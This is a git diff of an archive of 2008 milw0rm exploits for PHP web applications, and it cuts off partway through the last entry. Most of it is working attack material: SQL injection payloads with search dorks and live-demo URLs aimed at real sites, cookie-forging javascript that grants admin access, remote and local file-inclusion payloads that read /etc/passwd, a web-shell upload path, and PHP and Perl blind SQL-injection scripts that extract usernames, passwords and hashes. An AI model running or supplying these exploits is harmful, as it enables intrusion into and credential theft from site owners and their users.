-
-##########################################################
-# Author: Kad
-#
-# mail : kadfrox [ a ] gmail [ dot ] com
-#
-##########################################################
-#
-# script : RPortal v 1.1
-# http://www.rportal.org/?op=download&fid=36
-#
-##########################################################
-
-[~] Exploit :
-
-
-http://www.site.com/index.php?file_op=[url]
-
-#
-# Vulnerable code source :
-#
-
-if(!isset($file_op))$file_op='';
-
-if($file_op!="")
-
-{
-    $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));
-
-    if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);
-
-    include($file_op);
-
-}
-
-# The problem is that the variable $file_op is not filtered
-# Then, you can put the link that you want, like your own backdoor
-# and execute commands.
-
-# milw0rm.com [2008-10-01]
+#########################################################
+#
+# RPortal v1.1
+#
+#
+# Rportal is a management system of contents simple and powerful Web,
+# enabling you to create your site in a few minutes, while profiting
+# from a complete and effective administration.
+#
+#
+# Remote and Local File Inclusion Vulnerability <= 1.1
+# Found the 29th September 2008
+
+##########################################################
+# Author: Kad
+#
+# mail : kadfrox [ a ] gmail [ dot ] com
+#
+##########################################################
+#
+# script : RPortal v 1.1
+# http://www.rportal.org/?op=download&fid=36
+#
+##########################################################
+
+[~] Exploit :
+
+
+http://www.site.com/index.php?file_op=[url]
+
+#
+# Vulnerable code source :
+#
+
+if(!isset($file_op))$file_op='';
+
+if($file_op!="")
+
+{
+    $op_basepath = trim(strrev(strstr(strrev($file_op),"/php/")));
+
+    if($op_basepath!='') $op_basepath = str_replace("/php/", "/", $op_basepath);
+
+    include($file_op);
+
+}
+
+# The problem is that the variable $file_op is not filtered
+# Then, you can put the link that you want, like your own backdoor
+# and execute commands.
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6649.txt b/platforms/php/webapps/6649.txt
index ce338b2a6..169747353 100755
--- a/platforms/php/webapps/6649.txt
+++ b/platforms/php/webapps/6649.txt
@@ -1,22 +1,22 @@
-**************************************************************************************
-
-Author : By Crackers_Child
-Contact: cashr00t@hotmail.com
-Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends
-
-**************************************************************************************
-Script   : Ranking Script  -  Insecure Cookie Handling Vulnerability
-Demo     : http://www.ranking-script.de
-Dork     : pagerank-0-topliste.html  or pagerank-0-tipp.html
-
-**************************************************************************************
-
-Exploit : javascript:document.cookie = "admin=ja; path=/";
-
-Than go to > pagerank-0-admindaten.html and edit All thingz :)
-
-**************************************************************************************
-N0te : Ramazan Bayraminiz Mubarek Ola !
-**************************************************************************************
-
-# milw0rm.com [2008-10-01]
+**************************************************************************************
+
+Author : By Crackers_Child
+Contact: cashr00t@hotmail.com
+Greetz : biyosecurity.com & milw0rm.com & tryag.cc & All My Friends
+
+**************************************************************************************
+Script   : Ranking Script  -  Insecure Cookie Handling Vulnerability
+Demo     : http://www.ranking-script.de
+Dork     : pagerank-0-topliste.html  or pagerank-0-tipp.html
+
+**************************************************************************************
+
+Exploit : javascript:document.cookie = "admin=ja; path=/";
+
+Than go to > pagerank-0-admindaten.html and edit All thingz :)
+
+**************************************************************************************
+N0te : Ramazan Bayraminiz Mubarek Ola !
+**************************************************************************************
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6650.txt b/platforms/php/webapps/6650.txt
index 112f5c77d..7409e70d0 100755
--- a/platforms/php/webapps/6650.txt
+++ b/platforms/php/webapps/6650.txt
@@ -1,80 +1,80 @@
-|___________________________________________________|
-|
-|  Link Trader (lnkid) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                   |
-|
-| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
-|
-| DorK  : inurl:ratelink.php?lnkid=
-|___________________________________________________|
-
-Exploit: 
-
-
-
-www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
-
-
-
-
-
-
-L!VE DEMO:
-
-
-http://www.ezonescripts.com/productdemos/LinkTrader/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
-
-
-
-__________________________
-
-table_name : column_name
-
-
-o_categories:c_name
-o_categories:c_id
-o_categories:c_date
-o_links:l_id
-o_links:l_name
-o_links:l_email
-o_links:l_cid
-o_links:l_sitename
-o_links:l_homeurl
-o_links:l_linkurl
-o_links:l_slogan
-o_links:l_description
-o_links:l_webmasterschoice
-o_ratings:r_id
-o_ratings:r_lid
-o_ratings:r_votecount
-
-__________________________
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaG I
-
-# milw0rm.com [2008-10-01]
+|___________________________________________________|
+|
+|  Link Trader (lnkid) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                   |
+|
+| script : http://www.ezonescripts.com/scripts/sls/linktrader.php
+|
+| DorK  : inurl:ratelink.php?lnkid=
+|___________________________________________________|
+
+Exploit: 
+
+
+
+www.[target].com/Script/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
+
+
+
+
+
+
+L!VE DEMO:
+
+
+http://www.ezonescripts.com/productdemos/LinkTrader/ratelink.php?lnkid=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8,9,10,11,12+from+o_categories/*
+
+
+
+__________________________
+
+table_name : column_name
+
+
+o_categories:c_name
+o_categories:c_id
+o_categories:c_date
+o_links:l_id
+o_links:l_name
+o_links:l_email
+o_links:l_cid
+o_links:l_sitename
+o_links:l_homeurl
+o_links:l_linkurl
+o_links:l_slogan
+o_links:l_description
+o_links:l_webmasterschoice
+o_ratings:r_id
+o_ratings:r_lid
+o_ratings:r_votecount
+
+__________________________
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaG I
+
+# milw0rm.com [2008-10-01]
diff --git a/platforms/php/webapps/6652.txt b/platforms/php/webapps/6652.txt
index 0f2f01b42..efb1500ad 100755
--- a/platforms/php/webapps/6652.txt
+++ b/platforms/php/webapps/6652.txt
@@ -1,21 +1,21 @@
-#############################################################################################
-[+] Bux.to Clone script Insecure Cookie Handling Vulnerability
-[+] Discovered By SirGod
-[+] wWw.MorTal-TeaM.OrG
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
-#############################################################################################
-
-[+] Download :  http://depositfiles.com/files/6633532
-
-[+] Dork : (c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1
-
-[+] Script : http://depositfiles.com/files/6633532
-
-[+] Insecure Cookie Handling Vulnerability
-
-javascript:document.cookie = "loggedin=1; path=/"; document.cookie =
-"usNick=admin; path=/";
-
-#############################################################################################
-
-# milw0rm.com [2008-10-02]
+#############################################################################################
+[+] Bux.to Clone script Insecure Cookie Handling Vulnerability
+[+] Discovered By SirGod
+[+] wWw.MorTal-TeaM.OrG
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke,Codex
+#############################################################################################
+
+[+] Download :  http://depositfiles.com/files/6633532
+
+[+] Dork : (c) SriptBux 2008 | Powered By ScriptBux version 2.50 beta 1
+
+[+] Script : http://depositfiles.com/files/6633532
+
+[+] Insecure Cookie Handling Vulnerability
+
+javascript:document.cookie = "loggedin=1; path=/"; document.cookie =
+"usNick=admin; path=/";
+
+#############################################################################################
+
+# milw0rm.com [2008-10-02]
diff --git a/platforms/php/webapps/6653.txt b/platforms/php/webapps/6653.txt
index 1b2fae56a..811f42db6 100755
--- a/platforms/php/webapps/6653.txt
+++ b/platforms/php/webapps/6653.txt
@@ -1,49 +1,49 @@
-Security Advisory for 'OLIB 7 Webview'
-
-This software is apart of Moodle.
-
-Software - OLIB 7 WebView v2.5.1.1
-Exploit  - LFI
-Severity - High
-Author	 - ZeN
-website  - http://dusecurity.com/
-Date	 - 2nd October 2008
-
-DUSecurity Team / DarkCode
-
-
-Exploit >
-
-http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
-
-files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
-
-
-Info - You need to login to get a valid session key.
-
-
-------------------
-Extraz :
-
-Moodle Permanent XSS
-
-In Moodle blogging system, simply make a new blog entry with the title
-
-
-
-Now everyone that visits the bloggins system with execute your XSS.
-Go get some cookies =D
-
-Enjoy!
-
-------------------
-
-
-Shouts :-
-DUSecurity.com
-DarkCode.me
-Milw0rm.com
-iWannaHack
-WL-Group
-
-# milw0rm.com [2008-10-02]
+Security Advisory for 'OLIB 7 Webview'
+
+This software is apart of Moodle.
+
+Software - OLIB 7 WebView v2.5.1.1
+Exploit  - LFI
+Severity - High
+Author	 - ZeN
+website  - http://dusecurity.com/
+Date	 - 2nd October 2008
+
+DUSecurity Team / DarkCode
+
+
+Exploit >
+
+http://olib.site.com/cgi/?session=[session_key]&infile=[LFI]
+
+files in dir - get_settings.ini, setup.ini(contains config file locations), text.ini
+
+
+Info - You need to login to get a valid session key.
+
+
+------------------
+Extraz :
+
+Moodle Permanent XSS
+
+In Moodle blogging system, simply make a new blog entry with the title
+
+
+
+Now everyone that visits the bloggins system with execute your XSS.
+Go get some cookies =D
+
+Enjoy!
+
+------------------
+
+
+Shouts :-
+DUSecurity.com
+DarkCode.me
+Milw0rm.com
+iWannaHack
+WL-Group
+
+# milw0rm.com [2008-10-02]
diff --git a/platforms/php/webapps/6655.php b/platforms/php/webapps/6655.php
index 4f7f44345..3c6806749 100755
--- a/platforms/php/webapps/6655.php
+++ b/platforms/php/webapps/6655.php
@@ -1,53 +1,53 @@
-
-OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
-
    
-",0)) $i++;
-return $i;
-}
-function getValue($length){
-for ($a=1;$a<$length;$a++){
-$bl=45; $bh=123;
-while(!sockr($a,"=",$b=intval(($bl+$bh)/2)))
-if (sockr($a,">",$b)) $bl=$b;
-else $bh=$b;
-$v.=chr($b);}
-return $v; }
-$host="127.0.0.1";
-$result="concat(username,0x3A,password)";
-$table="ox_users";
-if(isset($_POST['host'])){
-extract($_POST);
-$l=0;
-while(sockr(1,">",0)) $l++;
-$f=$l;
-for ($l=0;$l<$f;$l++) 
-if ($length=getLength())  echo "VALUE: ".getValue($length)."
    "; }
-?>
-OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
    
-Vuln discovered and Exploit coded by d00m3r4ng
    Contact: d00m3r4ng[at]gmail.com    
-

    
-
    
-Host: 
    
-OpenX Path: /
    
-SELECT    FROM  
    
-
-
    
-
-# milw0rm.com [2008-10-02]
+
+OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
+
    
+",0)) $i++;
+return $i;
+}
+function getValue($length){
+for ($a=1;$a<$length;$a++){
+$bl=45; $bh=123;
+while(!sockr($a,"=",$b=intval(($bl+$bh)/2)))
+if (sockr($a,">",$b)) $bl=$b;
+else $bh=$b;
+$v.=chr($b);}
+return $v; }
+$host="127.0.0.1";
+$result="concat(username,0x3A,password)";
+$table="ox_users";
+if(isset($_POST['host'])){
+extract($_POST);
+$l=0;
+while(sockr(1,">",0)) $l++;
+$f=$l;
+for ($l=0;$l<$f;$l++) 
+if ($length=getLength())  echo "VALUE: ".getValue($length)."
    "; }
+?>
+OpenX Remote Blind SQL Injection Exploit By d00m3r4ng
    
+Vuln discovered and Exploit coded by d00m3r4ng
    Contact: d00m3r4ng[at]gmail.com    
+

    
+
    
+Host: 
    
+OpenX Path: /
    
+SELECT    FROM  
    
+
+
    
+
+# milw0rm.com [2008-10-02]
diff --git a/platforms/php/webapps/6657.pl b/platforms/php/webapps/6657.pl
index 460a76e13..4980b916a 100755
--- a/platforms/php/webapps/6657.pl
+++ b/platforms/php/webapps/6657.pl
@@ -1,91 +1,91 @@
-#!/usr/bin/perl 
-# -----------------------------------------------
-# IP Reg <= 0.4 Blind SQL Injection Exploit
-# Discovered By StAkeR - StAkeR[at]hotmail[dot]it 
-# Discovered On 03/10/2008 
-# -----------------------------------------------
-# Download http://sourceforge.net/projects/ipreg/
-# -----------------------------------------------
-
-use strict;
-use LWP::UserAgent;
-
-my @chars = (48..57, 97..102); 
-my $start = undef;
-my $stop  = undef;
-my $hash  = undef;
-my $substr = 1; 
-my $http = new LWP::UserAgent;
-my ($domain,$userid) = @ARGV;
-
-usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; 
-
-
-sub send_request
-{ 
-  my $post = undef;
-  my $host = $domain;
-  my $param = shift @_ or die $!;
-  
-  $host .= "/login.php";
-  $post = $http->post($host,[
-                             user_name => $param,
-                             user_pass => 'admin'
-                            ]);
- 
-}
-
-
-sub give_char
-{
-  my $send = undef;
-  my ($charz,$uidz) = @_;
-  
-  $send = "' or (select if((ascii(substring".
-          "(user_pass,$uidz,1))=$charz),".
-          "benchmark(200000000,char(0)),".
-          "0) from user where user_id=$userid)#";
-
-  return $send;
-}
-
-
-for(0..32) 
-{
-  foreach my $set(@chars)
-  {
-    my $start = time();
-    
-    send_request(give_char($set,$substr));
-    
-    my $stop = time();
-  
-    if($stop - $start > 3)
-    { 
-      $hash .= chr($set);
-      $substr++ and last;
-    }
-  }
-}
-
-sub usage
-{
-  print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n";
-  print "[?] Exploit Coded By StAkeR - Benchmark Method\n";
-  print "[?] Usage: perl $0 http://[host] [id]\n";
-  exit;
-}
-
-
-if(defined $hash and $http->get($domain)->is_success)   
-{
-  print "[?] Hash: $hash\n";
-  exit;
-}
-else
-{
-  print "[?] Exploit Failed!\n";
-  exit;
-}
-
-# milw0rm.com [2008-10-03]
+#!/usr/bin/perl 
+# -----------------------------------------------
+# IP Reg <= 0.4 Blind SQL Injection Exploit
+# Discovered By StAkeR - StAkeR[at]hotmail[dot]it 
+# Discovered On 03/10/2008 
+# -----------------------------------------------
+# Download http://sourceforge.net/projects/ipreg/
+# -----------------------------------------------
+
+use strict;
+use LWP::UserAgent;
+
+my @chars = (48..57, 97..102); 
+my $start = undef;
+my $stop  = undef;
+my $hash  = undef;
+my $substr = 1; 
+my $http = new LWP::UserAgent;
+my ($domain,$userid) = @ARGV;
+
+usage() unless $domain =~ /^http:\/\/(.+?)$/i and $userid =~ /^[0-9]$/; 
+
+
+sub send_request
+{ 
+  my $post = undef;
+  my $host = $domain;
+  my $param = shift @_ or die $!;
+  
+  $host .= "/login.php";
+  $post = $http->post($host,[
+                             user_name => $param,
+                             user_pass => 'admin'
+                            ]);
+ 
+}
+
+
+sub give_char
+{
+  my $send = undef;
+  my ($charz,$uidz) = @_;
+  
+  $send = "' or (select if((ascii(substring".
+          "(user_pass,$uidz,1))=$charz),".
+          "benchmark(200000000,char(0)),".
+          "0) from user where user_id=$userid)#";
+
+  return $send;
+}
+
+
+for(0..32) 
+{
+  foreach my $set(@chars)
+  {
+    my $start = time();
+    
+    send_request(give_char($set,$substr));
+    
+    my $stop = time();
+  
+    if($stop - $start > 3)
+    { 
+      $hash .= chr($set);
+      $substr++ and last;
+    }
+  }
+}
+
+sub usage
+{
+  print "[?] IP Reg <= 0.4 (login.php) Blind SQL Injection Exploit\n";
+  print "[?] Exploit Coded By StAkeR - Benchmark Method\n";
+  print "[?] Usage: perl $0 http://[host] [id]\n";
+  exit;
+}
+
+
+if(defined $hash and $http->get($domain)->is_success)   
+{
+  print "[?] Hash: $hash\n";
+  exit;
+}
+else
+{
+  print "[?] Exploit Failed!\n";
+  exit;
+}
+
+# milw0rm.com [2008-10-03]
diff --git a/platforms/php/webapps/6659.txt b/platforms/php/webapps/6659.txt
index 2b98aa4a6..d08255342 100755
--- a/platforms/php/webapps/6659.txt
+++ b/platforms/php/webapps/6659.txt
@@ -1,55 +1,55 @@
-|___________________________________________________|
-|
-| Full PHP Emlak Script (arsaprint.php id) Remote SQL Injection Vulnerability
-|
-|___________________________________________________
-|--------------------    Hussin X  -------------------|
-|
-|    Author: Hussin X
-|
-|    Home :  WwW.IQ-ty.CoM
-|
-|    email:  darkangel_g85[at]Yahoo[DoT]com
-|
-|
-|
-|___________________________________________________
-|                                                                                                     |
-|
-| script : http://php.arsivimiz.com/Kategoriler/PHP/alisveris
-| 
-| DorK   : :)
-|___________________________________________________|
-
-Exploit:  
-________
-
-
-
-www.[target].com/Script/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
-
-
-
-
-L!VE DEMO:
-_________
-
-
-http://www.ozsarigrup.com/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
-
-
-
-
-____________________________( Greetz )_________________________________
-|
-|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
-|
-|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
-|
-|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
-|_____________________________________________________________________
-
-
-                   Im IRAQi    |    Im TrYaG I
-
-# milw0rm.com [2008-10-03]
+|___________________________________________________|
+|
+| Full PHP Emlak Script (arsaprint.php id) Remote SQL Injection Vulnerability
+|
+|___________________________________________________
+|--------------------    Hussin X  -------------------|
+|
+|    Author: Hussin X
+|
+|    Home :  WwW.IQ-ty.CoM
+|
+|    email:  darkangel_g85[at]Yahoo[DoT]com
+|
+|
+|
+|___________________________________________________
+|                                                                                                     |
+|
+| script : http://php.arsivimiz.com/Kategoriler/PHP/alisveris
+| 
+| DorK   : :)
+|___________________________________________________|
+
+Exploit:  
+________
+
+
+
+www.[target].com/Script/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
+
+
+
+
+L!VE DEMO:
+_________
+
+
+http://www.ozsarigrup.com/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
+
+
+
+
+____________________________( Greetz )_________________________________
+|
+|    All members of the Forum WwW.IQ-ty.CoM |  WwW.TrYaG.CC |
+|
+|  My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+|    Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+                   Im IRAQi    |    Im TrYaG I
+
+# milw0rm.com [2008-10-03]
diff --git a/platforms/php/webapps/6663.txt b/platforms/php/webapps/6663.txt
index e7ea2b97e..dc2a281b1 100755
--- a/platforms/php/webapps/6663.txt
+++ b/platforms/php/webapps/6663.txt
@@ -1,80 +1,80 @@
-############################################################################################
-[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
-[+] Discovered By SirGod
-[+] wWw.MorTal-TeaM.OrG
-[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
-############################################################################################
-
-[+] Download Script :
-
-   http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar
-
-[+] Local File Inclusion
-
---------------------------------------------------------------------------------------------
-
-   PoC 1 :
-
-      http://[target]/[path]/index.php?skin=[Local File]%00
-
-   Example 1 :
-
-      http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00
-
-
---------------------------------------------------------------------------------------------
-
-   PoC 2 :
-
-      http://[target]/[path]/forums.php?skin=[Local File]%00
-
-   Example 2 :
-
-      http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00
-
-
---------------------------------------------------------------------------------------------
-
-   PoC 3 :
-
-      http://[target]/[path]/admin.php?skin=[Local File]%00
-
-   Example 3 :
-
-      http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00
-
---------------------------------------------------------------------------------------------
-
-   PoC 4 :
-
-      http://[target]/[path]/header.php?skin=[Local File]%00
-
-   Example 4 :
-
-      http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00
-
---------------------------------------------------------------------------------------------
-
-   PoC 5 :
-
-      http://[target]/[path]/pages/story.php?skin=[Local File]%00
-
-   Example 5 :
-
-      http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00
-
---------------------------------------------------------------------------------------------
-
-   PoC 6 :
-
-      http://[target]/[path]/pages/poll.php?skin=[Local File]%00
-
-   Example 6 :
-
-      http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00
-
---------------------------------------------------------------------------------------------
-
-############################################################################################
-
-# milw0rm.com [2008-10-03]
+############################################################################################
+[+] CCMS 3.1 (skin) Multiple Local File Inclusion Vulnerabilities
+[+] Discovered By SirGod
+[+] wWw.MorTal-TeaM.OrG
+[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
+############################################################################################
+
+[+] Download Script :
+
+   http://rapidshare.com/files/94804716/CCMS_v3.1_by_Mikel_Dean.rar
+
+[+] Local File Inclusion
+
+--------------------------------------------------------------------------------------------
+
+   PoC 1 :
+
+      http://[target]/[path]/index.php?skin=[Local File]%00
+
+   Example 1 :
+
+      http://127.0.0.1/path/index.php?skin=../../../../autoexec.bat%00
+
+
+--------------------------------------------------------------------------------------------
+
+   PoC 2 :
+
+      http://[target]/[path]/forums.php?skin=[Local File]%00
+
+   Example 2 :
+
+      http://127.0.0.1/path/forums.php?skin=../../../../autoexec.bat%00
+
+
+--------------------------------------------------------------------------------------------
+
+   PoC 3 :
+
+      http://[target]/[path]/admin.php?skin=[Local File]%00
+
+   Example 3 :
+
+      http://127.0.0.1/path/admin.php?skin=../../../../autoexec.bat%00
+
+--------------------------------------------------------------------------------------------
+
+   PoC 4 :
+
+      http://[target]/[path]/header.php?skin=[Local File]%00
+
+   Example 4 :
+
+      http://127.0.0.1/path/header.php?skin=../../../../autoexec.bat%00
+
+--------------------------------------------------------------------------------------------
+
+   PoC 5 :
+
+      http://[target]/[path]/pages/story.php?skin=[Local File]%00
+
+   Example 5 :
+
+      http://127.0.0.1/path/pages/story.php?skin=../../../../../autoexec.bat%00
+
+--------------------------------------------------------------------------------------------
+
+   PoC 6 :
+
+      http://[target]/[path]/pages/poll.php?skin=[Local File]%00
+
+   Example 6 :
+
+      http://127.0.0.1/path/pages/poll.php?skin=../../../../../autoexec.bat%00
+
+--------------------------------------------------------------------------------------------
+
+############################################################################################
+
+# milw0rm.com [2008-10-03]
diff --git a/platforms/php/webapps/6664.txt b/platforms/php/webapps/6664.txt
index 80aa3ac1c..530ed1e15 100755
--- a/platforms/php/webapps/6664.txt
+++ b/platforms/php/webapps/6664.txt
@@ -1,47 +1,47 @@
-==========================================================
-  Kwalbum <= 2.0.2 Arbitrary file upload Vulnerabilities
-==========================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 3 October 2008
-SITE   : cwh.citec.us
-
-##################################################################
-APPLICATION : Kwalbum
-VERSION     : <= 2.0.2
-DOWNLOAD    : http://downloads.sourceforge.net/kwalbum/kwalbum-2.0.2.zip
-##################################################################
-
------------------
-Description:
------------------
-After registeration, you may obtain view, upload or admin permission.
-If you obtain an upload permission, you can upload php files which can access as a below example url.
-
------------
-Exploit:
------------
-[+] upload page: http://[target]/[path to kwalbum]/?p=UploadItems
-[+] exploit file format: http://[target]/[path to kwalbum]/[path to store image]/[year]/[month]/shell.php
-[+] exploit file example: http://[target]/[path to kwalbum]/items/08/10/shell.php
-
-
-#####################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#####################################################################
-
-# milw0rm.com [2008-10-03]
+==========================================================
+  Kwalbum <= 2.0.2 Arbitrary file upload Vulnerabilities
+==========================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 3 October 2008
+SITE   : cwh.citec.us
+
+##################################################################
+APPLICATION : Kwalbum
+VERSION     : <= 2.0.2
+DOWNLOAD    : http://downloads.sourceforge.net/kwalbum/kwalbum-2.0.2.zip
+##################################################################
+
+-----------------
+Description:
+-----------------
+After registeration, you may obtain view, upload or admin permission.
+If you obtain an upload permission, you can upload php files which can access as a below example url.
+
+-----------
+Exploit:
+-----------
+[+] upload page: http://[target]/[path to kwalbum]/?p=UploadItems
+[+] exploit file format: http://[target]/[path to kwalbum]/[path to store image]/[year]/[month]/shell.php
+[+] exploit file example: http://[target]/[path to kwalbum]/items/08/10/shell.php
+
+
+#####################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#####################################################################
+
+# milw0rm.com [2008-10-03]
diff --git a/platforms/php/webapps/6667.txt b/platforms/php/webapps/6667.txt
index 9dc8ea8c7..b39254ca9 100755
--- a/platforms/php/webapps/6667.txt
+++ b/platforms/php/webapps/6667.txt
@@ -1,65 +1,65 @@
-# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
-# url: http://www.phlatline.org/docs/files/ppim.zip
-#
-# Author: JosS
-# mail: sys-project[at]hotmail[dot]com
-# site: http://spanish-hackers.com
-# team: Spanish Hackers Team - [SHT]
-#
-# This was written for educational purpose. Use it at your own risk.
-# Author will be not responsible for any damage.
-
-
-description of vulnerability:
------------------------------------------------
-the variable 'id' has been not defined in code 
-and the variable 'id' is sent by the users.
------------------------------------------------
-
-vuln file: notes.php
-
-vuln code:
-x:  >...
-107: if (isset($_GET["mode"]))
-
-	 {
-
-	  	if ($_GET["mode"]=="edit")
-
-		{
-
-		 if (isset($_GET['id']))
-
-		 {
-
-		  	$notefile = $_GET['id'];
-
-			if ($notefile == "new")
-
-			{
-
-			 $title = "";
-
-			 $notes = "";
-
-			}
-
-			else
-
-			{
-
-			 $temp = "notes/" . $notefile;
-
-			 require($temp);
-
-123:			}
-x:  <...
-x: }}}
-
-exploit: GET /notes.php?mode=edit&id=[file]
-sample (xpl): http://www.localhost.com/notes.php?mode=edit&id=../../../../../../../../../../etc/passwd
-
-live demo:
-http://www.phlatline.org/docs/demos/ppim/notes.php?mode=edit&id=../notes.php
-
-# milw0rm.com [2008-10-04]
+# pPIM 1.01 (notes.php id) Local File Inclusion Vulnerability
+# url: http://www.phlatline.org/docs/files/ppim.zip
+#
+# Author: JosS
+# mail: sys-project[at]hotmail[dot]com
+# site: http://spanish-hackers.com
+# team: Spanish Hackers Team - [SHT]
+#
+# This was written for educational purpose. Use it at your own risk.
+# Author will be not responsible for any damage.
+
+
+description of vulnerability:
+-----------------------------------------------
+the variable 'id' has been not defined in code 
+and the variable 'id' is sent by the users.
+-----------------------------------------------
+
+vuln file: notes.php
+
+vuln code:
+x:  >...
+107: if (isset($_GET["mode"]))
+
+	 {
+
+	  	if ($_GET["mode"]=="edit")
+
+		{
+
+		 if (isset($_GET['id']))
+
+		 {
+
+		  	$notefile = $_GET['id'];
+
+			if ($notefile == "new")
+
+			{
+
+			 $title = "";
+
+			 $notes = "";
+
+			}
+
+			else
+
